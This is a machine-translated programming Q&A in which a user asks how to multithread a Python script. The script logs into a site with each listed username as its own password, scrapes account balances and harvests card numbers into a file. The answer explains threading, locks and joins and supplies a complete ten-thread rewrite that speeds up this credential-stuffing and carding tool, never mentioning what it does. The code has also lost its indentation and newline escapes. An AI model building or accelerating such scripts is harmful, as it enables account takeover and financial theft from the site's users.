我 triyng 用 multthread 制作这个脚本没有成功,我是 python 的新手,有人可以帮助我吗?此请求正在工作,但速度太慢。
import mechanize
from bs4 import BeautifulSoup as BS
entrada="entrada.txt"
saida="saida.txt"
def escreve(texto):
with open(saida, "a") as myfile:
myfile.write(texto)
with open(entrada) as fp:
for user in fp:
try:
user = user.rstrip()
cont=1
br = mechanize.Browser()
br.addheaders = [('User-agent', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1')]
ua = 'Mozilla/5.0 (X11; Linux x86_64; rv:18.0) Gecko/20100101 Firefox/18.0 (compatible;)'
br.set_handle_robots(False)
br.open("https://site")
br.select_form(nr=0)
br['username']=user
br['password']= user
response = br.submit()
soup = BS(br.response().read(),'lxml')
value = soup.find_all('a')
txt = "nConta - Saldo[" + value[2].text+"]n"
print txt
escreve(txt)
response = br.open("https://test/sub/")
soup2 = BS(br.response().read(),'lxml')
txt = "Procurando por cartoes na conta"
print txt
escreve(txt)
for tds in soup2.find_all('td'):
if (len(tds.text)>30):
cc = "CC["+str(cont)+"] ~> " + tds.text+"n"
print cc
escreve(cc)
cont+=1
txt = "nTotal ["+str(cont-1)+"]n-------------------------------------------------n"
escreve(txt)
except Exception:
erro = "n[!]Erro ao logar["+user+"]n-------------------------------------------------n"
escreve(erro)
print erro
此脚本登录并报废一些信息,此代码工作正常,但太慢。提前感谢!
正如bmcculley所提到的,你可以参考这个问题作为参考,或者你可以参考文档。
如何多线程
Python 中的多线程可以通过 threading
模块完成。您需要知道如何创建线程,如何为您的案例锁定和加入它们。
创建话题
要创建线程,您需要为线程创建一个类。该类将子类threading.Thread
。
import threading
class MyThread(threading.Thread):
def __init__(self):
threading.Thread.__init__(self)
def run(self):
# Your code here
您也可以像普通类一样添加参数。
运行线程
为线程创建类后,可以创建线程:
thread = MyThread()
并运行它:
thread.start()
锁定多个线程
锁定线程可防止线程同时使用资源。这是您的案例所必需的,因为您的线程将写入saida.txt
并打印到标准输出。
假设您有一个线程WriteThread
将一些文本写入文件:
import threading
class WriteThread(threading.Thread):
def __init__(self, text, output):
threading.Thread.__init__(self)
self.text = text
self.output = output
def run(self):
output.write(text)
with open("output.txt", "a+") as f:
# Create threads
thread_a = WriteThread("foo", f)
thread_b = WriteThread("bar", f)
# Start threads
thread_a.start()
thread_b.start()
该程序可能仍然可以工作,但允许它们同时访问同一文件不是一个好主意。相反,当thread_a
写入文件时,将使用锁来防止thread_b
写入文件。
import threading
file_lock = threading.Lock()
class WriteThread(threading.Thread):
def __init__(self, text, output):
threading.Thread.__init__(self)
self.text = text
self.output = output
def run(self):
# Acquire Lock
file_lock.acquire()
output.write(text)
# Release Lock
file_lock.release()
with open("output.txt", "a+") as f:
# Create threads
a = WriteThread("foo", f)
b = WriteThread("bar", f)
# Start threads
a.start()
b.start()
file_lock.acquire()
的意思是线程将等待另一个线程release
file_lock
,以便它可以使用该文件。
联接多个线程
联接线程是一种将所有线程同步在一起的方法。当多个线程联接时,它们需要等到所有线程都完成才能继续。
假设我有两个线程具有不同的代码执行时间,我希望它们在继续之前完成它们正在执行的任何操作。
import threading
import time
class WaitThread(threading.Thread):
def __init__(self, time_to_wait, text):
threading.Thread.__init__(self)
self.time_to_wait = time_to_wait
self.text = text
def run(self):
# Wait!
time.sleep(self.time_to_wait)
print self.text
# Thread will wait for 1 second before it finishes
thread_a = WaitThread(1, "Thread a has ended!")
# Thread will wait for 2 seconds before it finishes
thread_b = WaitThread(2, "Thread b has ended!")
threads = []
threads.append(thread_a)
threads.append(thread_b)
# Start threads
thread_a.start()
thread_b.start()
# Join threads
for t in threads:
t.join()
print "Both threads have ended!"
在此示例中,thread_a
将先打印,然后再打印thread_b
打印。但是,只有在打印thread_a
和thread_b
后,它才会执行print "Both threads have ended!"
。
应用
现在,回到你的代码。
除了实现多线程、锁定和连接之外,我还做了不少更改,但整个想法是有两个锁(一个用于打印,一个用于写入文件)并在一定的限制内执行它们。(线程太多不好!参考这个问题)
import mechanize
from bs4 import BeautifulSoup as BS
import threading
# Max no. of threads allowed to be alive.
limit = 10
entrada = "entrada.txt"
saida = "saida.txt"
def write(text):
with open(saida, "a") as f:
f.write(text)
# Threading locks
fileLock = threading.Lock()
printLock = threading.Lock()
def print_out(text):
printLock.acquire()
print text
printLock.release()
# Thread for each user
class UserThread(threading.Thread):
def __init__(self, user):
threading.Thread.__init__(self)
self.user = user.rstrip()
def run(self):
to_file = ""
try:
cont = 1
# Initialize Mechanize
br = mechanize.Browser()
br.addheaders = [('User-agent', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1')]
br.set_handle_robots(False)
br.open("https://site")
# Submit form
br.select_form(nr=0)
br["username"] = self.user
br["password"] = self.user
br.submit()
# Soup Response
soup = BS(br.response().read(), "lxml")
value = soup.find_all("a")
# Write to file
txt = "nConta - Saldo["+value[2].text+"]n"
print_out(txt)
to_file += txt
# Retrieve response from another page
br.open("https://test/sub")
soup = BS(br.response().read(), "lxml")
# Write to file
txt = "Procurando por cartoes na conta"
print_out(txt)
to_file += txt
for tds in soup.find_all("td"):
if len(tds.text) > 30:
# Write to file
cc = "CC["+str(cont)+"] ~> "+tds.text+"n"
print_out(cc)
to_file += cc
cont += 1
txt = "nTotal ["+str(cont-1)+"]n-------------------------------------------------n"
to_file += txt
except Exception:
erro = "n[!]Erro ao logar["+self.user+"]n-------------------------------------------------n"
to_file += erro
print_out(erro)
# Write everything to file
fileLock.acquire()
write(to_file)
fileLock.release()
threads = []
with open(entrada) as fp:
for user in fp:
threads.append(UserThread(user))
active_threads = []
for thread in threads:
if len(active_threads) <= limit:
# Start threads
thread.start()
active_threads.append(thread)
else:
for t in active_threads:
# Wait for everything to complete before moving to next set
t.join()
active_threads = []
小编辑:
将所有单引号更改为双引号
在操作员之间和需要
的地方增加间距删除了未使用的变量ua
将未使用的变量response = br.submit()
和response = br.open("https://test/sub")
替换为br.submit()
和br.open("https://test/sub")